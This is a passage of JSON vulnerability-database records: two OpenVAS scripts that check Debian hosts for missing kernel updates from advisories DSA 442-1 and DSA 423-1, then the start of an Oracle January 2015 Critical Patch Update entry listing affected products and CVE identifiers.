Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several security related problems have been fixed in the Linux kernel\n2.4.17 used for the S/390 architecture, mostly by backporting fixes\nfrom 2.4.18 and incorporating recent security fixes. \n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.4.17-2.woody.3 of s390 images and in version\n0.0.20020816-0.woody.2 of the patch packages.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390\nannounced via advisory DSA 442-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20442-1\";\n\nif(description)\n{\n script_id(53142);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\", \"CVE-2003-0961\", \"CVE-2003-0985\", \"CVE-2004-0077\", \"CVE-2002-0429\", \"CVE-2002-0429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 442-1 (kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-s390\", ver:\"0.0.20020816-0.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-2.woody.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-s390\", ver:\"2.4.17-2.woody.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:44", "references": [], "pluginID": "53122", "description": "The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 423-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 423-1 (kernel-image-2.4.17-ia64)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0961", "CVE-2003-0461", "CVE-2003-0985", "CVE-2003-0127", "CVE-2003-0001", "CVE-2003-0501", "CVE-2003-0552", "CVE-2003-0476", "CVE-2003-0462", "CVE-2003-0018", "CVE-2003-0551", "CVE-2003-0550"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53122", "id": "OPENVAS:53122", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_423_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 423-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The IA-64 maintainers fixed several security related bugs in the Linux\nkernel 2.4.17 used for the IA-64 architecture, mostly by backporting\nfixes from 2.4.18. The resolved issues are identified by the appropriate\nCVE identifiers:\n\nCVE-2003-0001, CVE-2003-0018, CVE-2003-0127, CVE-2003-0461\nCVE-2003-0462, CVE-2003-0476, CVE-2003-0501, CVE-2003-0550\nCVE-2003-0551, CVE-2003-0552, CVE-2003-0961, CVE-2003-0985\n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion kernel-image-2.4.17-ia64 for the ia64 architecture. Other\narchitectures are already or will be fixed separately.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith newly uploaded packages.\";\ntag_summary = \"The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 423-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20423-1\";\n\nif(description)\n{\n script_id(53122);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0018\", \"CVE-2003-0127\", \"CVE-2003-0461\", \"CVE-2003-0462\", \"CVE-2003-0476\", \"CVE-2003-0501\", \"CVE-2003-0550\", \"CVE-2003-0551\", \"CVE-2003-0552\", \"CVE-2003-0961\", \"CVE-2003-0985\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 423-1 (kernel-image-2.4.17-ia64)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17-ia64\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17-ia64\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium-smp\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley-smp\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:13:47", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 169 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nPlease note that on October 16, 2014, Oracle released information for [CVE-2014-3566 \"POODLE\"](<http://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2014-3566 in addition to the fixes announced in this CPU.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2015-03-10T00:00:00", "title": "Oracle Critical Patch Update - January 2015", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle HCM Configuration Workbench", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.4.2", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.2", "operator": "le"}, {"name": "Workspace Manager", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u72", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Java SE", "version": "5.0u75", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.3", "operator": "le"}, {"name": "Workspace Manager", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "8.0", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.20", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "27.8.4", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.2.2", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1118", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u85", "operator": "le"}, {"name": "Java SE", "version": "8u25", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.1.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2240", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u71", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "1.x", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "10.1.3.5.0", "operator": "le"}, {"name": "MICROS Retail", "version": "6.0.6", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "11.1.1.7", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3.", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE", "version": "6u85", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.4", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "3.0.x", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.3", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.2.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.28", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.1.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u25", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "MICROS Retail", "version": "5.5.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "10.1.3.4.2", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "10.1.3.4.2", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.2.2", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.5.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.4", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "4.x", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "11.1.1.7", "operator": "le"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.26", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Containers for J2EE", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.38", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.28", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "4", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "5.0u75", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "MICROS Retail", "version": "4.5.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "5.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Java SE", "version": "7u72", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.26", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.2.2", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.2.2", "operator": "le"}, {"name": "MICROS Retail", "version": "3.2.1", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5.33.0", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.1.1", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1119", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "MICROS Retail", "version": "6.5.2", "operator": "le"}, {"name": "PL/SQL", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.4", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.40", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u6", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.2.2", "operator": "le"}, {"name": "Integrated Lights Out Manager(ILOM)", "version": "3.2.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.0.1.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "7.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.19", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2232", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.0", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.36", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "3.x", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Agile PLM for Process", "version": "6.1.0.3", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.21", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.4", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.2", "operator": "le"}, {"name": "Recovery", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "2.x", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.5", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.2.1.0", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.2.2", "operator": "le"}, {"name": "PL/SQL", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.24", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "4.0.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "5.0.3", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2.0", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.3", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.1.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.3.6.0", "operator": "le"}, {"name": "MICROS Retail", "version": "4.8.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Waveset", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2011-4317", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-0231", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2013-6449", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2014-0076", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-5704", "CVE-2013-5605", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", 